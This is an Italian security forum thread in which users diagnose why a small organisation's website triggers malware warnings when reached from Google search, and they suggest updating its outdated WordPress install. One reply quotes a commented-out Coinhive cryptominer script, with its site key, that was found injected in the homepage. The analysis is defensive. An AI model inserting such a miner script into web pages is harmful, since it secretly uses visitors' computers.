Discussione Aiuto per rimozione malware....

Stato
Discussione chiusa ad ulteriori risposte.
Ordina per data Ordina commenti per reazioni
E

Eoloprox

Utente Emerald
20 Marzo 2016
607
151
51
415
Ultima modifica:
Salve a tutti,

Mi chiedevo se potevate aiutarmi nell’analisi tecnica di un sito internet, che mi rileva la presenza di malware il mio KasperSKY, allego uno screen della prova...
Non riesco a capire di cosa si tratta nello specifico, cosi da aiutare l'hosting e il creaotore del sito a risolvere la problematica... grazie

222.png


Malware al link attenzione


Rettifico subito, dal link diretto non sussite problema, forse e più grossa la storia....Il malware si presenta solo tramite ricerca da google... che succede?

Immagine 2023-07-20 151335.png



Aggiungo un dettaglio, sto usando una sim VERY-MOBILE.
 
così su due piedi (non ho ancora guardato nel dettaglio) le cose possono essere due o tre:
  • SEO Poisoning - la pagina indicizzata in realtà appartiene ad un altro sito che sta "spoofando" quello legittimo (difficile che sia questo)
  • li hanno pwnati (probabile, soprattutto guardando i risultati su questa pagina https://www.comunionetorredeicorsari.it/archived/)
  • takeover/problemi di qualche tipo coi DNS

provo a dare un'occhiata un po' meglio
 
Per me li hanno pwnati. Tra l'altro casca pure a pennello con la pubblicazione di un tool da perte di alcuni miei amici per la messa in sicurezza di siti wordpress. Il tool si chiama https://pwnpress.io/, consiglierei loro di installarlo e di verificare che non siano stati bucati.

La cosa strana e che non riesco a riprodurre in maniera costante la casistica, a volte mi redirige sul sito malevolo, altre volte no
 
Si ho ho notato anche io, io lo deduco dall'antivirus della rete, su very lo becca, sulla ho. mobile non lo vede +...
Se li avessero pwnati quali sono i rischi intercorsi?
 
Eoloprox ha detto:
Salve a tutti,

Mi chiedevo se potevate aiutarmi nell’analisi tecnica di un sito internet, che mi rileva la presenza di malware il mio KasperSKY, allego uno screen della prova...
Non riesco a capire di cosa si tratta nello specifico, cosi da aiutare l'hosting e il creaotore del sito a risolvere la problematica... grazie

Visualizza allegato 70732

Malware al link attenzione


Rettifico subito, dal link diretto non sussite problema, forse e più grossa la storia....Il malware si presenta solo tramite ricerca da google... che succede?

Visualizza allegato 70733


Aggiungo un dettaglio, sto usando una sim VERY-MOBILE.
Clicca per espandere...
Penso che riguardi https ssl certificati scaduti, avranno modificato qualcosa (per errore) parlo della persona che gestisce il sito lato hosting.
 
ok non mi ero accorto, li hanno pwnati

Nella home page c'è questo script commentato, probabilmente server side c'è qualcosa che lo un-commenta in base a qualche parametro
HTML: 
<!-- <script src="https://coinhive.com/lib/coinhive.min.js"></script><script>var miner = new CoinHive.Anonymous("wNca6sxwp2SVi0ye8ptXaxvPfvbYT1Zf");miner.start({threads:2,throttle: 0});</script> -->
 
è un collegamento a materiale malevolo? Leggo miner... azz

Un numero di thread più alto e/o un numero di accelerazione più basso comporteranno un maggiore utilizzo della CPU nel browser del client. Con una percentuale di occupazione della CPU più elevata, gli utenti finali probabilmente sperimenteranno un comportamento lento e una scarsa esperienza sui siti web.
 
Eoloprox ha detto:
è un collegamento a materiale malevolo? Leggo miner... azz

Un numero di thread più alto e/o un numero di accelerazione più basso comporteranno un maggiore utilizzo della CPU nel browser del client. Con una percentuale di occupazione della CPU più elevata, gli utenti finali probabilmente sperimenteranno un comportamento lento e una scarsa esperienza sui siti web.
Clicca per espandere...
yes, stavo cercando di capire in che modo l'avessero bucato ma tra poco devo uscire.
Ho visto che comunque usano una versione vecchia di WordPress con delle vulnerabilità note, suggerirei loro di aggiornare all'ultima versione (e agigornare anche gli eventuali plugin)
 
Faccio le conlusioni, hanno messo dentro il download id un miner che fa riferimento alla piattaforma che le consente di minare in remoto sulla macchina infetta..... Detto ciò se è commentata la stringa non viene saltata? Questo non mi e chiaro
 
Eoloprox ha detto:
Faccio le conlusioni, hanno messo dentro il download id un miner che fa riferimento alla piattaforma che le consente di minare in remoto sulla macchina infetta..... Detto ciò se è commentata la stringa non viene saltata? Questo non mi e chiaro
Clicca per espandere...
Sì, lo script dovrebbe essere ignorato, ma probabilmente c'è qualche modo che permetta di servire lo script senza il commento e di farlo quindi eseguire. Ma la questione è un po' più complicata, a quanto pare il sito è stato bucato un po' di tempo fa (non so quando), ma attualmente il miner è disattivo e il dominio che conteneva il codice malevolo per minare è stato acquistato da un ricercatore che sta cercando di fare awarness (in sostanza il miner non è più attivo).

Quindi sono in realtà al punto di partenza, non capisco come sia stato possibile che le prime due o tre volte che ho visitato il sito sia stato re-diretto su dei siti spam
 
Stato
Discussione chiusa ad ulteriori risposte.

DISCUSSIONI SIMILI

N
Discussione Gli errori più comuni che facilitano la strada agli hacker (Unix/Windows)
  • Chiuso
  • 3
  • 412
3
412
Sicurezza Informatica
Netcat
N
Discussione [Guida] Come ottenere proxy decenti gratuitamente
  • Chiuso
  • 0
  • 459
0
459
Sicurezza Informatica
Netcat
M
Discussione Articolo Attacco ransomware a Postel società controllata da Poste Italiane del 15 Agosto 2023
  • Chiuso
  • 11
  • 1K
11
1K
Sicurezza Informatica
MRPants
0
Guida I migliori libri per studiare l'Ethical Hacking e Penetration Testing nel 2024
  • Release
  • In evidenza
  • 29
  • 8K
29
8K
Pentesting e Ethical Hacking Guide e Tools
0xbro
M
Domanda Risolto Link visitati "evidenziati" privacy
  • 4
  • 431
4
431
Privacy Online e Anonimato
Mat72
Top Bottom
Indietro